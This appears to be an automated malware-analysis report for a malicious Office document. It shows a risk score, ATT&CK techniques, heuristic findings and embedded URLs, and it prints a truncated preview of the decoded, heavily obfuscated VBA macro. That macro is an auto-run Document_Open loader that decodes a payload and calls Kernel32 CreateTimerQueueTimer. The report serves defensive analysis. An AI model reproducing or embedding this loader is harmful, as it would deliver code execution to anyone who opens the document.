MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1027 Obfuscated Files or Information
The sample is an Office document containing VBA macros, specifically a Document_Open macro that utilizes GetObject, indicating an attempt to execute code upon opening. The VBA code is heavily obfuscated, suggesting an effort to hide malicious activity such as downloading and executing a second-stage payload. The presence of an embedded URL, though currently of unknown reputation, is a potential indicator of compromise.
Heuristics 5
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.eastoftheweb.com/short-stories/UBooks/JereMagi942.shtml In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10816 bytes |
SHA-256: 34e0862698f96ab89445ad5d10bf498d940412f6df28e95e972f5fc7068d9f13 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function biradial(articulately) As String Dim allantoic(6962) As Byte Dim baroque As Long Dim chimakum As Long Dim despumate() As Byte Dim beanfeast As Long Dim harem(63) As Long Dim barbecue As Long Dim atelier(63) As Long Dim illdigested(63) As Long seeing = 39 - 80 + 65321 aneurysmal = 9 - 112 + 65639 bumper = 7 - 40 + 4129 ectoderm = 45 - 27 + 16711662 Dim capella() As Byte capella = VBA.StrConv(articulately, 128) cooks = 5 + 32 Pmt 0, cooks, 7585, 47529, 8 copaiba = 7840 + 3 finem = vbKeyShift - 12 For unauthoritative = (1 - 1) To copaiba * 1 If unauthoritative Mod (6 - 4) = (3 - 3) Then capella(unauthoritative) = capella(unauthoritative) - finem Else capella(unauthoritative) = capella(unauthoritative) - (finem - 1) End If Next unauthoritative sympathectomy = 11 + 51 Pmt 0, sympathectomy, 25280, 57587, 6 uncertain = 107 - 100 - 7 prionace = 80 - 3 - 34 archegenesis = abolishment For beanfeast = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6) harem(beanfeast) = plebiscitum(beanfeast, (4 - 94 + 154), 30 + 5) atelier(beanfeast) = plebiscitum(beanfeast, bumper, 30 + 5) illdigested(beanfeast) = plebiscitum(beanfeast, (120 - 41 + 262065), 30 + 5) Next beanfeast breastfed = 39 + 9 Pmt 0, breastfed, 36651, 54834, 2 despumate = capella grampositive = 18 + 59 Pmt 0, grampositive, 12329, 36386, 3 northwestward = 122 - 24 - 95 enfranchised = 36 - 122 + 88 For barbecue = 0 To copaiba clay = despumate(barbecue) belay = despumate(barbecue + 2) baggala = atelier(archegenesis(despumate(barbecue + 1))) cupronickel = harem(archegenesis(belay)) + _ archegenesis(despumate(barbecue + northwestward)) baroque = illdigested(archegenesis(clay)) + baggala + cupronickel beanfeast = plebiscitum(baroque, ectoderm, 20 + 7) allantoic(chimakum) = plebiscitum(beanfeast, aneurysmal, 10 + 7) beanfeast = plebiscitum(baroque, seeing, 20 + 7) allantoic(chimakum + 1) = plebiscitum(beanfeast, (15 - 23 + 264), 10 + 7) allantoic(chimakum + enfranchised) = plebiscitum(baroque, (1 - 79 + 333), 20 + 7) chimakum = chimakum + enfranchised + 1 barbecue = barbecue + 3 Next biradial = allantoic End Function Function braze() unwelcome.hallucinogen.Value = Day(#12/5/2013#) Set aerobiotic = unwelcome.hallucinogen.SelectedItem symmetry = 51 + 44 Pmt 0, symmetry, 19244, 48842, 8 whim = aerobiotic.Name justly = 50 - 49 + 7843 crenulate = Right(whim, justly) hipless = biradial(crenulate) footwear = 40 + 48 Pmt 0, footwear, 13324, 17438, 6 #If (14 * 4 + 6) > (9 - 4 * 2) And (99 - 11 * 9) * 30 < (Win64) Then Dim upbow As LongPtr Dim seedtime As LongPtr Dim ploy As LongPtr Dim fumble As LongPtr Dim pattern As LongPtr ramshead = 118 - 128 + 2074 #End If #If (14 * 4 + 6) > (9 - 4 * 2) And Not (99 - 11 * 9) * 30 < (Win64) Then Dim seedtime As Long Dim upbow As Long Dim ploy As Long Dim fumble As Long Dim pattern As Long ramshead = (14 - 25 + 792) + 3459 #End If adaptability = 21 + 13 Pmt 0, adaptability, 2073, 45246, 2 melicoccus = 20 + 37 Pmt 0, melicoccus, 29396, 52316, 4 antibacterial = hipless upbow = morder.malabo(antibacterial) ploy = 102 - 7 - 95 seedtime = upbow + ramshead fumble = 63 - 108 + 201572 pattern = 71 - 80 + 3509 balaenicipitidae = decapitate(fumble, _ ploy, seedtime, _ ploy, ploy, ploy, _ ploy) bonnet = 59 + 1 Pmt 0, bonnet, 13549, 52182, 5 End Function Private Sub Document_Open() remissness = "mate" braze canaliculated = 9 + 19 Pmt 0, canaliculated, 36418, 18210, 5 End Sub Attribute VB_Name = "soave" ' Es ist kalt und regungslos #If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then ' Die Nacht A¶ffnet ihren SchoAY ' Ich weiAY nicht wie du heiAYt Public Declare Function decapitate _ Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (etiolate As ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.